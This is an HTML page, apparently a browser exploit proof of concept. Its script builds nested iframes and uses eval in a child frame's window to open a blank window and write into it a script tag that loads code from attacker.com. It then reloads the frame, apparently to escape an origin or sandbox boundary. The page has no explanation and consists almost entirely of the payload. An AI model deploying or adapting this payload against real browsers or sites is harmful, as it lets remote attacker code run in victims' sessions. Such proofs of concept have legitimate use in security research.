<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGdAOnmGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGdAOnmGGGGG.addEventListener("load",()=>{GGGGGdAOnmGGGGG.srcdoc="<iframe id=GGGGdAOnmGGGG src=about:blank><\/iframe><script>GGGGdAOnmGGGG.onload=_=>GGGGdAOnmGGGG.contentWindow.eval('w=window.open(`about:blank`); w.document.write(`<script src=https://attacker.com/static/static.js><\\/script>`);');GGGGdAOnmGGGG.contentWindow.location.reload();<\/script>";},{once:true});
};
</script>
</body>
</html>